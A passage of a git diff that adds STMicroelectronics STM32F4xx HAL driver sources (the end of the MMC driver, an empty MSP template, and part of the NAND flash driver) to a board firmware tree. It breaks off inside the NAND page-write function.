(void)SDIO_WriteFIFO(hmmc->Instance, &data); + } + + hmmc->pTxBuffPtr = tmp; + hmmc->TxXferSize = dataremaining; + } +} + +/** + * @} + */ + +#endif /* SDIO */ + +#endif /* HAL_MMC_MODULE_ENABLED */ + +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_msp_template.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_msp_template.c new file mode 100644 index 000000000..67f658c0d --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_msp_template.c @@ -0,0 +1,101 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_msp_template.c + * @author MCD Application Team + * @brief This file contains the HAL System and Peripheral (PPP) MSP initialization + * and de-initialization functions. + * It should be copied to the application folder and renamed into 'stm32f4xx_hal_msp.c'. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup HAL_MSP HAL MSP + * @brief HAL MSP module. + * @{ + */ + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ + +/** @defgroup HAL_MSP_Private_Functions HAL MSP Private Functions + * @{ + */ + +/** + * @brief Initializes the Global MSP. + * @note This function is called from HAL_Init() function to perform system + * level initialization (GPIOs, clock, DMA, interrupt). + * @retval None + */ +void HAL_MspInit(void) +{ + +} + +/** + * @brief DeInitializes the Global MSP. + * @note This functiona is called from HAL_DeInit() function to perform system + * level de-initialization (GPIOs, clock, DMA, interrupt). + * @retval None + */ +void HAL_MspDeInit(void) +{ + +} + +/** + * @brief Initializes the PPP MSP. + * @note This functiona is called from HAL_PPP_Init() function to perform + * peripheral(PPP) system level initialization (GPIOs, clock, DMA, interrupt) + * @retval None + */ +void HAL_PPP_MspInit(void) +{ + +} + +/** + * @brief DeInitializes the PPP MSP. + * @note This functiona is called from HAL_PPP_DeInit() function to perform + * peripheral(PPP) system level de-initialization (GPIOs, clock, DMA, interrupt) + * @retval None + */ +void HAL_PPP_MspDeInit(void) +{ + +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_nand.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_nand.c new file mode 100644 index 000000000..2bff47fc5 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_nand.c @@ -0,0 +1,2045 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_nand.c + * @author MCD Application Team + * @brief NAND HAL module driver. + * This file provides a generic firmware to drive NAND memories mounted + * as external device. + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + This driver is a generic layered driver which contains a set of APIs used to + control NAND flash memories. It uses the FMC/FSMC layer functions to interface + with NAND devices. This driver is used as follows: + + (+) NAND flash memory configuration sequence using the function HAL_NAND_Init() + with control and timing parameters for both common and attribute spaces. + + (+) Read NAND flash memory maker and device IDs using the function + HAL_NAND_Read_ID(). The read information is stored in the NAND_ID_TypeDef + structure declared by the function caller. + + (+) Access NAND flash memory by read/write operations using the functions + HAL_NAND_Read_Page_8b()/HAL_NAND_Read_SpareArea_8b(), + HAL_NAND_Write_Page_8b()/HAL_NAND_Write_SpareArea_8b(), + HAL_NAND_Read_Page_16b()/HAL_NAND_Read_SpareArea_16b(), + HAL_NAND_Write_Page_16b()/HAL_NAND_Write_SpareArea_16b() + to read/write page(s)/spare area(s). These functions use specific device + information (Block, page size..) predefined by the user in the HAL_NAND_Info_TypeDef + structure. The read/write address information is contained by the Nand_Address_Typedef + structure passed as parameter. + + (+) Perform NAND flash Reset chip operation using the function HAL_NAND_Reset(). + + (+) Perform NAND flash erase block operation using the function HAL_NAND_Erase_Block(). + The erase block address information is contained in the Nand_Address_Typedef + structure passed as parameter. + + (+) Read the NAND flash status operation using the function HAL_NAND_Read_Status(). + + (+) You can also control the NAND device by calling the control APIs HAL_NAND_ECC_Enable()/ + HAL_NAND_ECC_Disable() to respectively enable/disable the ECC code correction + feature or the function HAL_NAND_GetECC() to get the ECC correction code. + + (+) You can monitor the NAND device HAL state by calling the function + HAL_NAND_GetState() + + [..] + (@) This driver is a set of generic APIs which handle standard NAND flash operations. + If a NAND flash device contains different operations and/or implementations, + it should be implemented separately. + + *** Callback registration *** + ============================================= + [..] + The compilation define USE_HAL_NAND_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + + Use Functions @ref HAL_NAND_RegisterCallback() to register a user callback, + it allows to register following callbacks: + (+) MspInitCallback : NAND MspInit. + (+) MspDeInitCallback : NAND MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + Use function @ref HAL_NAND_UnRegisterCallback() to reset a callback to the default + weak (surcharged) function. It allows to reset following callbacks: + (+) MspInitCallback : NAND MspInit. + (+) MspDeInitCallback : NAND MspDeInit. + This function) takes as parameters the HAL peripheral handle and the Callback ID. + + By default, after the @ref HAL_NAND_Init and if the state is HAL_NAND_STATE_RESET + all callbacks are reset to the corresponding legacy weak (surcharged) functions. + Exception done for MspInit and MspDeInit callbacks that are respectively + reset to the legacy weak (surcharged) functions in the @ref HAL_NAND_Init + and @ref HAL_NAND_DeInit only when these callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the @ref HAL_NAND_Init and @ref HAL_NAND_DeInit + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) + + Callbacks can be registered/unregistered in READY state only. + Exception done for MspInit/MspDeInit callbacks that can be registered/unregistered + in READY or RESET state, thus registered (user) MspInit/DeInit callbacks can be used + during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using @ref HAL_NAND_RegisterCallback before calling @ref HAL_NAND_DeInit + or @ref HAL_NAND_Init function. + + When The compilation define USE_HAL_NAND_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registering feature is not available + and weak (surcharged) callbacks are used. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + + +#ifdef HAL_NAND_MODULE_ENABLED + +#if defined(STM32F405xx) || defined(STM32F415xx) || defined(STM32F407xx) || defined(STM32F417xx) ||\ + defined(STM32F427xx) || defined(STM32F437xx) || defined(STM32F429xx) || defined(STM32F439xx) ||\ + defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) + +/** @defgroup NAND NAND + * @brief NAND HAL module driver + * @{ + */ + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @defgroup NAND_Private_Constants NAND Private Constants + * @{ + */ + +/** + * @} + */ + +/* Private macro -------------------------------------------------------------*/ +/** @defgroup NAND_Private_Macros NAND Private Macros + * @{ + */ + +/** + * @} + */ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ +/** @defgroup NAND_Exported_Functions NAND Exported Functions + * @{ + */ + +/** @defgroup NAND_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * + @verbatim + ============================================================================== + ##### NAND Initialization and de-initialization functions ##### + ============================================================================== + [..] + This section provides functions allowing to initialize/de-initialize + the NAND memory + +@endverbatim + * @{ + */ + +/** + * @brief Perform NAND memory Initialization sequence + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @param ComSpace_Timing pointer to Common space timing structure + * @param AttSpace_Timing pointer to Attribute space timing structure + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NAND_Init(NAND_HandleTypeDef *hnand, FMC_NAND_PCC_TimingTypeDef *ComSpace_Timing, FMC_NAND_PCC_TimingTypeDef *AttSpace_Timing) +{ + /* Check the NAND handle state */ + if(hnand == NULL) + { + return HAL_ERROR; + } + + if(hnand->State == HAL_NAND_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hnand->Lock = HAL_UNLOCKED; + +#if (USE_HAL_NAND_REGISTER_CALLBACKS == 1) + if(hnand->MspInitCallback == NULL) + { + hnand->MspInitCallback = HAL_NAND_MspInit; + } + hnand->ItCallback = HAL_NAND_ITCallback; + + /* Init the low level hardware */ + hnand->MspInitCallback(hnand); +#else + /* Initialize the low level hardware (MSP) */ + HAL_NAND_MspInit(hnand); +#endif + } + + /* Initialize NAND control Interface */ + FMC_NAND_Init(hnand->Instance, &(hnand->Init)); + + /* Initialize NAND common space timing Interface */ + FMC_NAND_CommonSpace_Timing_Init(hnand->Instance, ComSpace_Timing, hnand->Init.NandBank); + + /* Initialize NAND attribute space timing Interface */ + FMC_NAND_AttributeSpace_Timing_Init(hnand->Instance, AttSpace_Timing, hnand->Init.NandBank); + + /* Enable the NAND device */ + __FMC_NAND_ENABLE(hnand->Instance, hnand->Init.NandBank); + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Perform NAND memory De-Initialization sequence + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NAND_DeInit(NAND_HandleTypeDef *hnand) +{ +#if (USE_HAL_NAND_REGISTER_CALLBACKS == 1) + if(hnand->MspDeInitCallback == NULL) + { + hnand->MspDeInitCallback = HAL_NAND_MspDeInit; + } + + /* DeInit the low level hardware */ + hnand->MspDeInitCallback(hnand); +#else + /* Initialize the low level hardware (MSP) */ + HAL_NAND_MspDeInit(hnand); +#endif + + /* Configure the NAND registers with their reset values */ + FMC_NAND_DeInit(hnand->Instance, hnand->Init.NandBank); + + /* Reset the NAND controller state */ + hnand->State = HAL_NAND_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hnand); + + return HAL_OK; +} + +/** + * @brief NAND MSP Init + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @retval None + */ +__weak void HAL_NAND_MspInit(NAND_HandleTypeDef *hnand) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hnand); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_NAND_MspInit could be implemented in the user file + */ +} + +/** + * @brief NAND MSP DeInit + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @retval None + */ +__weak void HAL_NAND_MspDeInit(NAND_HandleTypeDef *hnand) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hnand); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_NAND_MspDeInit could be implemented in the user file + */ +} + + +/** + * @brief This function handles NAND device interrupt request. + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @retval HAL status +*/ +void HAL_NAND_IRQHandler(NAND_HandleTypeDef *hnand) +{ + /* Check NAND interrupt Rising edge flag */ + if(__FMC_NAND_GET_FLAG(hnand->Instance, hnand->Init.NandBank, FMC_FLAG_RISING_EDGE)) + { + /* NAND interrupt callback*/ +#if (USE_HAL_NAND_REGISTER_CALLBACKS == 1) + hnand->ItCallback(hnand); +#else + HAL_NAND_ITCallback(hnand); +#endif + + /* Clear NAND interrupt Rising edge pending bit */ + __FMC_NAND_CLEAR_FLAG(hnand->Instance, hnand->Init.NandBank, FMC_FLAG_RISING_EDGE); + } + + /* Check NAND interrupt Level flag */ + if(__FMC_NAND_GET_FLAG(hnand->Instance, hnand->Init.NandBank, FMC_FLAG_LEVEL)) + { + /* NAND interrupt callback*/ +#if (USE_HAL_NAND_REGISTER_CALLBACKS == 1) + hnand->ItCallback(hnand); +#else + HAL_NAND_ITCallback(hnand); +#endif + + /* Clear NAND interrupt Level pending bit */ + __FMC_NAND_CLEAR_FLAG(hnand->Instance, hnand->Init.NandBank, FMC_FLAG_LEVEL); + } + + /* Check NAND interrupt Falling edge flag */ + if(__FMC_NAND_GET_FLAG(hnand->Instance, hnand->Init.NandBank, FMC_FLAG_FALLING_EDGE)) + { + /* NAND interrupt callback*/ +#if (USE_HAL_NAND_REGISTER_CALLBACKS == 1) + hnand->ItCallback(hnand); +#else + HAL_NAND_ITCallback(hnand); +#endif + + /* Clear NAND interrupt Falling edge pending bit */ + __FMC_NAND_CLEAR_FLAG(hnand->Instance, hnand->Init.NandBank, FMC_FLAG_FALLING_EDGE); + } + + /* Check NAND interrupt FIFO empty flag */ + if(__FMC_NAND_GET_FLAG(hnand->Instance, hnand->Init.NandBank, FMC_FLAG_FEMPT)) + { + /* NAND interrupt callback*/ +#if (USE_HAL_NAND_REGISTER_CALLBACKS == 1) + hnand->ItCallback(hnand); +#else + HAL_NAND_ITCallback(hnand); +#endif + + /* Clear NAND interrupt FIFO empty pending bit */ + __FMC_NAND_CLEAR_FLAG(hnand->Instance, hnand->Init.NandBank, FMC_FLAG_FEMPT); + } +} + +/** + * @brief NAND interrupt feature callback + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @retval None + */ +__weak void HAL_NAND_ITCallback(NAND_HandleTypeDef *hnand) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hnand); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_NAND_ITCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup NAND_Exported_Functions_Group2 Input and Output functions + * @brief Input Output and memory control functions + * + @verbatim + ============================================================================== + ##### NAND Input and Output functions ##### + ============================================================================== + [..] + This section provides functions allowing to use and control the NAND + memory + +@endverbatim + * @{ + */ + +/** + * @brief Read the NAND memory electronic signature + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @param pNAND_ID NAND ID structure + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NAND_Read_ID(NAND_HandleTypeDef *hnand, NAND_IDTypeDef *pNAND_ID) +{ + __IO uint32_t data = 0U; + __IO uint32_t data1 = 0U; + uint32_t deviceaddress = 0U; + + /* Process Locked */ + __HAL_LOCK(hnand); + + /* Check the NAND controller state */ + if(hnand->State == HAL_NAND_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Identify the device address */ + if(hnand->Init.NandBank == FMC_NAND_BANK2) + { + deviceaddress = NAND_DEVICE1; + } + else + { + deviceaddress = NAND_DEVICE2; + } + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_BUSY; + + /* Send Read ID command sequence */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_READID; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + + /* Read the electronic signature from NAND flash */ +#ifdef FSMC_PCR2_PWID + if (hnand->Init.MemoryDataWidth == FSMC_NAND_PCC_MEM_BUS_WIDTH_8) +#else /* FMC_PCR2_PWID is defined */ + if (hnand->Init.MemoryDataWidth == FMC_NAND_PCC_MEM_BUS_WIDTH_8) +#endif + { + data = *(__IO uint32_t *)deviceaddress; + + /* Return the data read */ + pNAND_ID->Maker_Id = ADDR_1ST_CYCLE(data); + pNAND_ID->Device_Id = ADDR_2ND_CYCLE(data); + pNAND_ID->Third_Id = ADDR_3RD_CYCLE(data); + pNAND_ID->Fourth_Id = ADDR_4TH_CYCLE(data); + } + else + { + data = *(__IO uint32_t *)deviceaddress; + data1 = *((__IO uint32_t *)deviceaddress + 4U); + + /* Return the data read */ + pNAND_ID->Maker_Id = ADDR_1ST_CYCLE(data); + pNAND_ID->Device_Id = ADDR_3RD_CYCLE(data); + pNAND_ID->Third_Id = ADDR_1ST_CYCLE(data1); + pNAND_ID->Fourth_Id = ADDR_3RD_CYCLE(data1); + } + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnand); + + return HAL_OK; +} + +/** + * @brief NAND memory reset + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NAND_Reset(NAND_HandleTypeDef *hnand) +{ + uint32_t deviceaddress = 0U; + + /* Process Locked */ + __HAL_LOCK(hnand); + + /* Check the NAND controller state */ + if(hnand->State == HAL_NAND_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Identify the device address */ + if(hnand->Init.NandBank == FMC_NAND_BANK2) + { + deviceaddress = NAND_DEVICE1; + } + else + { + deviceaddress = NAND_DEVICE2; + } + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_BUSY; + + /* Send NAND reset command */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = 0xFF; + + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnand); + + return HAL_OK; + +} + +/** + * @brief Configure the device: Enter the physical parameters of the device + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @param pDeviceConfig pointer to NAND_DeviceConfigTypeDef structure + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NAND_ConfigDevice(NAND_HandleTypeDef *hnand, NAND_DeviceConfigTypeDef *pDeviceConfig) +{ + hnand->Config.PageSize = pDeviceConfig->PageSize; + hnand->Config.SpareAreaSize = pDeviceConfig->SpareAreaSize; + hnand->Config.BlockSize = pDeviceConfig->BlockSize; + hnand->Config.BlockNbr = pDeviceConfig->BlockNbr; + hnand->Config.PlaneSize = pDeviceConfig->PlaneSize; + hnand->Config.PlaneNbr = pDeviceConfig->PlaneNbr; + hnand->Config.ExtraCommandEnable = pDeviceConfig->ExtraCommandEnable; + + return HAL_OK; +} + +/** + * @brief Read Page(s) from NAND memory block (8-bits addressing) + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @param pAddress pointer to NAND address structure + * @param pBuffer pointer to destination read buffer + * @param NumPageToRead number of pages to read from block + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NAND_Read_Page_8b(NAND_HandleTypeDef *hnand, NAND_AddressTypeDef *pAddress, uint8_t *pBuffer, uint32_t NumPageToRead) +{ + __IO uint32_t index = 0U; + uint32_t tickstart = 0U; + uint32_t deviceaddress = 0U, size = 0U, numPagesRead = 0U, nandaddress = 0U; + + /* Process Locked */ + __HAL_LOCK(hnand); + + /* Check the NAND controller state */ + if(hnand->State == HAL_NAND_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Identify the device address */ + if(hnand->Init.NandBank == FMC_NAND_BANK2) + { + deviceaddress = NAND_DEVICE1; + } + else + { + deviceaddress = NAND_DEVICE2; + } + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_BUSY; + + /* NAND raw address calculation */ + nandaddress = ARRAY_ADDRESS(pAddress, hnand); + + /* Page(s) read loop */ + while((NumPageToRead != 0U) && (nandaddress < ((hnand->Config.BlockSize) * (hnand->Config.BlockNbr)))) + { + /* update the buffer size */ + size = (hnand->Config.PageSize) + ((hnand->Config.PageSize) * numPagesRead); + + /* Send read page command sequence */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_AREA_A; + + /* Cards with page size <= 512 bytes */ + if((hnand->Config.PageSize) <= 512U) + { + if (((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) <= 65535U) + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + } + else /* ((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) > 65535 */ + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_3RD_CYCLE(nandaddress); + } + } + else /* (hnand->Config.PageSize) > 512 */ + { + if (((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) <= 65535U) + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + } + else /* ((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) > 65535 */ + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_3RD_CYCLE(nandaddress); + } + } + + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_AREA_TRUE1; + + /* Check if an extra command is needed for reading pages */ + if(hnand->Config.ExtraCommandEnable == ENABLE) + { + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Read status until NAND is ready */ + while(HAL_NAND_Read_Status(hnand) != NAND_READY) + { + if((HAL_GetTick() - tickstart ) > NAND_WRITE_TIMEOUT) + { + return HAL_TIMEOUT; + } + } + + /* Go back to read mode */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = ((uint8_t)0x00); + __DSB(); + } + + /* Get Data into Buffer */ + for(; index < size; index++) + { + *(uint8_t *)pBuffer++ = *(uint8_t *)deviceaddress; + } + + /* Increment read pages number */ + numPagesRead++; + + /* Decrement pages to read */ + NumPageToRead--; + + /* Increment the NAND address */ + nandaddress = (uint32_t)(nandaddress + 1U); + } + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnand); + + return HAL_OK; +} + +/** + * @brief Read Page(s) from NAND memory block (16-bits addressing) + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @param pAddress pointer to NAND address structure + * @param pBuffer pointer to destination read buffer. pBuffer should be 16bits aligned + * @param NumPageToRead number of pages to read from block + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NAND_Read_Page_16b(NAND_HandleTypeDef *hnand, NAND_AddressTypeDef *pAddress, uint16_t *pBuffer, uint32_t NumPageToRead) +{ + __IO uint32_t index = 0U; + uint32_t tickstart = 0U; + uint32_t deviceaddress = 0U, size = 0U, numPagesRead = 0U, nandaddress = 0U; + + /* Process Locked */ + __HAL_LOCK(hnand); + + /* Check the NAND controller state */ + if(hnand->State == HAL_NAND_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Identify the device address */ + if(hnand->Init.NandBank == FMC_NAND_BANK2) + { + deviceaddress = NAND_DEVICE1; + } + else + { + deviceaddress = NAND_DEVICE2; + } + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_BUSY; + + /* NAND raw address calculation */ + nandaddress = ARRAY_ADDRESS(pAddress, hnand); + + /* Page(s) read loop */ + while((NumPageToRead != 0U) && (nandaddress < ((hnand->Config.BlockSize) * (hnand->Config.BlockNbr)))) + { + /* update the buffer size */ + size = (hnand->Config.PageSize) + ((hnand->Config.PageSize) * numPagesRead); + + /* Send read page command sequence */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_AREA_A; + __DSB(); + + /* Cards with page size <= 512 bytes */ + if((hnand->Config.PageSize) <= 512U) + { + if (((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) <= 65535U) + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + } + else /* ((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) > 65535 */ + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_3RD_CYCLE(nandaddress); + } + } + else /* (hnand->Config.PageSize) > 512 */ + { + if (((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) <= 65535U) + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + } + else /* ((hnand->Config.BlockSize)*(hnand->Config.BlockNbr)) > 65535 */ + { + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = 0x00; + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_1ST_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_2ND_CYCLE(nandaddress); + *(__IO uint8_t *)((uint32_t)(deviceaddress | ADDR_AREA)) = ADDR_3RD_CYCLE(nandaddress); + } + } + + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = NAND_CMD_AREA_TRUE1; + + if(hnand->Config.ExtraCommandEnable == ENABLE) + { + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Read status until NAND is ready */ + while(HAL_NAND_Read_Status(hnand) != NAND_READY) + { + if((HAL_GetTick() - tickstart ) > NAND_WRITE_TIMEOUT) + { + return HAL_TIMEOUT; + } + } + + /* Go back to read mode */ + *(__IO uint8_t *)((uint32_t)(deviceaddress | CMD_AREA)) = ((uint8_t)0x00); + } + + /* Calculate PageSize */ +#ifdef FSMC_PCR2_PWID + if (hnand->Init.MemoryDataWidth == FSMC_NAND_PCC_MEM_BUS_WIDTH_8) +#else /* FMC_PCR2_PWID is defined */ + if (hnand->Init.MemoryDataWidth == FMC_NAND_PCC_MEM_BUS_WIDTH_8) +#endif + { + size = size / 2U; + } + else + { + /* Do nothing */ + /* Keep the same PageSize for FMC_NAND_MEM_BUS_WIDTH_16*/ + } + + /* Get Data into Buffer */ + for(; index < size; index++) + { + *(uint16_t *)pBuffer++ = *(uint16_t *)deviceaddress; + } + + /* Increment read pages number */ + numPagesRead++; + + /* Decrement pages to read */ + NumPageToRead--; + + /* Increment the NAND address */ + nandaddress = (uint32_t)(nandaddress + 1U); + } + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hnand); + + return HAL_OK; +} + +/** + * @brief Write Page(s) to NAND memory block (8-bits addressing) + * @param hnand pointer to a NAND_HandleTypeDef structure that contains + * the configuration information for NAND module. + * @param pAddress pointer to NAND address structure + * @param pBuffer pointer to source buffer to write + * @param NumPageToWrite number of pages to write to block + * @retval HAL status + */ +HAL_StatusTypeDef HAL_NAND_Write_Page_8b(NAND_HandleTypeDef *hnand, NAND_AddressTypeDef *pAddress, uint8_t *pBuffer, uint32_t NumPageToWrite) +{ + __IO uint32_t index = 0U; + uint32_t tickstart = 0U; + uint32_t deviceaddress = 0U, size = 0U, numPagesWritten = 0U, nandaddress = 0U; + + /* Process Locked */ + __HAL_LOCK(hnand); + + /* Check the NAND controller state */ + if(hnand->State == HAL_NAND_STATE_BUSY) + { + return HAL_BUSY; + } + + /* Identify the device address */ + if(hnand->Init.NandBank == FMC_NAND_BANK2) + { + deviceaddress = NAND_DEVICE1; + } + else + { + deviceaddress = NAND_DEVICE2; + } + + /* Update the NAND controller state */ + hnand->State = HAL_NAND_STATE_BUSY; + + /* NAND raw address calculation */ + nandaddress = ARRAY_ADDRESS(pAddress, hnand); + + /* Page(s) write loop */ + while((NumPageToWrite != 0U) && (nandaddress < 